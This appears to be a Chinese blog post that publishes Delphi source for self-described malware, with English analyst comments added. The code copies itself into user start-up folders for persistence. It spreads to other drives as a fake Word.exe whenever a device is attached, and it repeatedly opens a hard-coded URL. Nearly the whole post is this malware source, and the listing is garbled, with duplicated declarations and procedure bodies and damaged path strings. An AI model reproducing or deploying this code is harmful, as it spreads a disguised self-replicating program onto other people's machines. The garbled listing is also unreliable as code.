這個 Delphi 程式是去年上半年為了測試病毒和病毒程式碼庫所做的惡意程式,功能有:程式執行後,會將自己新增到系統啟動項中;如果有U盤接入,會自動複製自己到U盤上;還可以在指定時間內,在系統後臺進行某些操作,比如開啟網頁什麼的。該程式已經在去年被列為病毒了。本文只做技術交流,請勿用於非法用途,出現任何問題,本人概不負責。下面是程式碼,以 Delphi 7 開發,用了一個 Timer 控制元件:
unit Unit1;
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
Dialogs,ShellApi,StdCtrls, ExtCtrls;
Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
Dialogs,ShellApi,StdCtrls, ExtCtrls;
// Form class of the sample. It declares three entry points, each tied to one
// behaviour described in the article text:
//   FormCreate     - runs when the form is created (start-up copy logic)
//   Timer1Timer    - runs on every Timer1 tick (opens a URL)
//   WMDeviceChange - receives the WM_DEVICECHANGE window message
type
TForm1 = class(TForm)
// Timer component; its interval is not visible in this listing.
Timer1: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
// The message directive routes WM_DEVICECHANGE to this method, so the form
// is notified of device changes without polling.
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
// NOTE(review): the declaration below repeats the one above verbatim;
// this looks like a page-extraction artefact, not a second class.
TForm1 = class(TForm)
Timer1: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
// Global form instance (the line is printed twice on this page).
var
Form1: TForm1;
Form1: TForm1;
implementation
{$R *.dfm}
// WM_DEVICECHANGE handler: the self-copy (propagation) routine of the sample.
//
// Msg.WParam carries the device event code. 32768 ($8000) is the value of
// DBT_DEVICEARRIVAL and 32772 ($8004) is DBT_DEVICEREMOVECOMPLETE; the
// commented-out label text in each branch ("drive inserted" / "drive
// removed") matches that reading.
//
// On arrival the routine lists the logical drive roots, keeps those whose
// GetDriveType result equals DRIVE_CDROM, and for a root matching E:, F:, G:
// or H: copies the running executable to the following drive letter under
// the name Word.exe.
//
// Analyst notes:
//  - Observable effect: a process copying its own image to another volume as
//    Word.exe right after a device-arrival event. The file name imitates an
//    Office binary (masquerading); the technique corresponds to replication
//    through removable media.
//  - NOTE(review): string literals in this listing look altered by page
//    extraction (back-ticks as quote marks, shortened paths); treat the drive
//    and file names as approximate indicators and confirm against a sample.
procedure TForm1.WMDeviceChange (var Msg: TMessage);
var
//myMsg : String;
m_Result,i:Integer;
str_temp:string;
buf:array [0..MAX_PATH-1] of char;
begin
Case Msg.WParam of
32768:
begin
//myMsg :=`U盤插入`;
//Label1.Caption:=myMsg;
// buf receives consecutive null-terminated root names; m_Result is the
// number of characters written.
m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
// Each entry occupies four characters, so the loop steps through buf in
// units of four.
for i:=0 to (m_Result div 4) do
begin
// First three characters of the i-th entry (the terminator is skipped).
str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
if getdrivetype(pchar(str_temp)) = DRIVE_CDROM then
begin
// Last CopyFile argument False = do not fail if the target exists, so an
// existing Word.exe at the destination is overwritten.
if str_temp =`E:` then
CopyFile(Pchar(Application.ExeName),Pchar(`F:Word.exe`),False);
if str_temp =`F:` then
CopyFile(Pchar(Application.ExeName),Pchar(`G:Word.exe`),False);
if str_temp =`G:` then
CopyFile(Pchar(Application.ExeName),Pchar(`H:Word.exe`),False);
if str_temp =`H:` then
CopyFile(Pchar(Application.ExeName),Pchar(`I:Word.exe`),False);
end;
end;
end;
32772:
begin
// Removal event: no action is taken (only commented-out UI code).
//myMsg :=`U盤拔出`;
//Label1.Caption:=myMsg;
end;
end;
end;
// NOTE(review): everything from here to the matching final "end;" repeats the
// var section and body of TForm1.WMDeviceChange verbatim. It appears to be a
// page-extraction artefact rather than a second routine; it carries no
// procedure header of its own.
var
//myMsg : String;
m_Result,i:Integer;
str_temp:string;
buf:array [0..MAX_PATH-1] of char;
begin
Case Msg.WParam of
32768:
begin
//myMsg :=`U盤插入`;
//Label1.Caption:=myMsg;
m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
for i:=0 to (m_Result div 4) do
begin
str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
if getdrivetype(pchar(str_temp)) = DRIVE_CDROM then
begin
if str_temp =`E:` then
CopyFile(Pchar(Application.ExeName),Pchar(`F:Word.exe`),False);
if str_temp =`F:` then
CopyFile(Pchar(Application.ExeName),Pchar(`G:Word.exe`),False);
if str_temp =`G:` then
CopyFile(Pchar(Application.ExeName),Pchar(`H:Word.exe`),False);
if str_temp =`H:` then
CopyFile(Pchar(Application.ExeName),Pchar(`I:Word.exe`),False);
end;
end;
end;
32772:
begin
//myMsg :=`U盤拔出`;
//Label1.Caption:=myMsg;
end;
end;
end;
// Form-creation handler: the persistence routine of the sample.
//
// It targets the Start Menu start-up folder of two user profiles under
// "Documents and Settings" (Administrator and a second profile), again using
// the file name Word.exe. Programs placed in a start-up folder are launched
// at logon, which is the "added to system start-up items" behaviour the
// article describes.
//
// Control flow as written: when both files already exist the first copy is
// skipped (empty then-branch); otherwise the running executable is copied to
// the Administrator path. The second CopyFile is outside the if/else and runs
// on every start. Both FileSetAttr calls that would set the hidden attribute
// are commented out, so the copies are left visible.
//
// Analyst notes:
//  - Observable effect: an executable named Word.exe appearing in a per-user
//    start-up folder, written by a process copying its own image. This is
//    start-up-folder persistence combined with name masquerading.
//  - NOTE(review): the path literals are damaged on this page (back-ticks as
//    quote marks, separators missing, one path split across two lines); use
//    them as approximate indicators only.
procedure TForm1.FormCreate(Sender: TObject);
begin
if fileexists(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`) and fileexists(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`)then
else
CopyFile(Pchar(Application.ExeName),Pchar(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`),False);
//FileSetAttr(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`,FILE_ATTRIBUTE_HIDDEN);
CopyFile(Pchar(Application.ExeName),Pchar(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`),False);
//FileSetAttr(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`,FILE_ATTRIBUTE_HIDDEN);
end;
// NOTE(review): this begin..end repeats the body of TForm1.FormCreate
// verbatim and has no procedure header of its own; it appears to be a
// page-extraction artefact rather than additional logic.
begin
if fileexists(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`) and fileexists(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`)then
else
CopyFile(Pchar(Application.ExeName),Pchar(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`),False);
//FileSetAttr(`C:Documents and SettingsAdministrator「開始」選單程式啟動Word.exe`,FILE_ATTRIBUTE_HIDDEN);
CopyFile(Pchar(Application.ExeName),Pchar(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`),False);
//FileSetAttr(`C:Documents and Settings
ew「開始」選單程式啟動Word.exe`,FILE_ATTRIBUTE_HIDDEN);
end;
// Timer tick handler: the background-action routine of the sample.
//
// On every Timer1 tick it passes a fixed URL to ShellExecute with the "open"
// verb and SW_SHOW, so the URL is handed to whatever program is registered
// for it and shown in a visible window. The tick interval is not visible in
// this listing.
//
// Analyst note: the observable effect is a repeated launch of the URL handler
// for one hard-coded address, started by a process that is not itself a
// browser.
procedure TForm1.Timer1Timer(Sender: TObject);
// The "var" keyword is printed twice on this page (extraction artefact).
var
var
strurl:string;
begin
StrUrl:=`http://www.cnking.org`;
ShellExecute(0,`open`,pchar(StrUrl),nil,nil,SW_SHOW);
end;
end.